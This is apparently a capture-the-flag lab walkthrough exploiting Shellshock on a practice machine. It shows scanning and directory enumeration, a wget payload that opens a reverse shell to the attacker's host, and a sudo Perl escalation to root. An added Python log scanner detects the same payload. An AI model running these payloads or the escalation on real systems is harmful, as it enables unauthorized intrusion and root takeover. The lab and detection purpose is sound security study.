freebuf1999
The ShellShock vulnerability, known in Chinese as "破壳漏洞", is a high-severity vulnerability in the Unix shell bash. It was first disclosed on 24 September 2014. In some web server deployments bash is used to handle certain requests, which allows an attacker to execute arbitrary shell commands through a vulnerable older version of bash.
0x01 Reconnaissance
First, gather information with nmap:
┌──(root㉿Oscp-Ielts)-[~]
└─# nmap -sC -sV -A -v 10.10.10.56
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 21:44 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:44
Completed NSE at 21:44, 0.00s elapsed
Initiating NSE at 21:44
Completed NSE at 21:44, 0.00s elapsed
Initiating NSE at 21:44
Completed NSE at 21:44, 0.00s elapsed
Initiating Ping Scan at 21:44
Scanning 10.10.10.56 [4 ports]
Completed Ping Scan at 21:44, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:44
Completed Parallel DNS resolution of 1 host. at 21:44, 0.01s elapsed
Initiating SYN Stealth Scan at 21:44
Scanning localhost (10.10.10.56) [1000 ports]
Discovered open port 80/tcp on 10.10.10.56
Discovered open port 2222/tcp on 10.10.10.56
Completed SYN Stealth Scan at 21:44, 2.42s elapsed (1000 total ports)
Initiating Service scan at 21:44
Scanning 2 services on localhost (10.10.10.56)
Completed Service scan at 21:45, 6.50s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against localhost (10.10.10.56)
Retrying OS detection (try #2) against localhost (10.10.10.56)
Retrying OS detection (try #3) against localhost (10.10.10.56)
Retrying OS detection (try #4) against localhost (10.10.10.56)
Retrying OS detection (try #5) against localhost (10.10.10.56)
Initiating Traceroute at 21:45
Completed Traceroute at 21:45, 0.25s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:45
Completed Parallel DNS resolution of 1 host. at 21:45, 0.01s elapsed
NSE: Script scanning 10.10.10.56.
Initiating NSE at 21:45
Completed NSE at 21:45, 7.08s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.99s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Nmap scan report for localhost (10.10.10.56)
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4f8ade8f80477decf150d630a187e49 (RSA)
| 256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_ 256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Uptime guess: 0.398 days (since Sun Apr 30 12:12:19 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 244.17 ms localhost (10.10.14.1)
2 244.24 ms localhost (10.10.10.56)
NSE: Script Post-scanning.
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.84 seconds
Raw packets sent: 1220 (57.738KB) | Rcvd: 1131 (48.770KB)
From the nmap results, the target has two commonly used open ports: 80 providing an http service and 22 providing an ssh service.
Visiting http://10.10.10.56 gives the result shown below:
Since the home page contains no useful information, the next step is directory enumeration with dirsearch:
python3 dirsearch.py -u 10.10.10.56 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e default
When the scan finishes, the result is:
The /cgi-bin/ and /server-status/ directories are found. From experience, /cgi-bin/ often contains executable scripts with .sh, .pl and .cgi extensions, so run: python3 dirsearch.py -u 10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e sh,pl, which gives:
Exploitation: the .sh script under /cgi-bin/
Visiting http://10.10.10.56/cgi-bin/user.sh triggers a download of the file user.sh, as shown below.
The contents of user.sh are shown below. The file is the output of the uptime command, a typical system command executed through the bash shell. Requesting http://10.10.10.56/cgi-bin/user.sh several times shows that the content changes with time, so on every download the uptime command is executed in real time and its result returned.
0x02 Exploitation: Shellshock PoC test
Given how user.sh behaves, namely that uptime is executed in real time through a bash shell and the result is returned as a downloaded file, the data served at http://10.10.10.56/cgi-bin/user.sh is produced by bash, so this script may be vulnerable to Shellshock.
So we test a ShellShock payload:
wget -qO- -U "() { :;}; echo Content-Type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.7/8888 0>&1" http://10.10.10.56/cgi-bin/user.sh
Here 10.10.14.7 is the Kali host and port 8888 is the listening port on Kali.
As shown, the target's shell is successfully bounced back to port 8888 on Kali.
cd /home/shelly and read user.txt: user-level access obtained.
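From the defender's side, the request above leaves a distinctive trace in the web server log: the bash exported-function marker "() {" inside the User-Agent (or any other header the CGI environment receives). The following Python is an added example, not part of the original write-up, that parses Apache combined-format access-log lines and flags such requests; the log lines are constructed samples modelled on this walkthrough.

```python
import re
from typing import Dict, List, Optional, Tuple

# Apache "combined" log format: ip ident user [ts] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Bash exported-function marker "() {" (whitespace inside the parentheses tolerated).
# A vulnerable bash parses any environment variable that starts this way as a
# function definition, and Apache exports request headers to CGI scripts as env vars.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_shellshock_attempt(entry: Dict[str, str]) -> bool:
    """True if any attacker-controlled field that can reach the CGI environment carries the marker."""
    return any(SHELLSHOCK_RE.search(entry.get(field, "")) for field in ("ua", "referer", "req"))


def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client ip, request line, user-agent) for every line that looks like a Shellshock probe."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_shellshock_attempt(entry):
            hits.append((entry["ip"], entry["req"], entry["ua"]))
    return hits


# Constructed sample log lines (not taken from the original target).
SAMPLE_LOG = [
    '10.10.14.7 - - [30/Apr/2023:21:50:01 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Wget/1.21"',
    '10.10.14.7 - - [30/Apr/2023:21:51:12 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" '
    '"() { :;}; echo Content-Type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.7/8888 0>&1"',
    '10.10.14.9 - - [30/Apr/2023:21:52:30 -0400] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, req, ua in scan_log(SAMPLE_LOG):
        print(f"ALERT Shellshock attempt from {ip}: {req} UA={ua!r}")
```

Beyond logging, the durable fix is upgrading bash to a patched version and not exposing shell scripts through mod_cgi at all.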
Exploitation: local weakness, sudo permissions
As everyone knows, Perl and Python are similar scripting languages. Since Perl can be run as root, we can easily use Perl code to build a reverse-shell command, or execute a system command that opens a new terminal, to obtain root privileges.
sudo /usr/bin/perl -e 'exec "/bin/sh"' , with the following result:
As can be seen, executing the Perl script from the reverse shell running as user shelly establishes a new shell with root privileges.
0x03 Summary
In this machine walkthrough, directory enumeration with dirsearch revealed the file user.sh, which calls a bash shell to execute the uptime command in real time and returns the result as a downloaded file. This suggested Shellshock, and the subsequent PoC test confirmed it. Finally, the scripting features of Perl and Python were used to obtain root on the target host.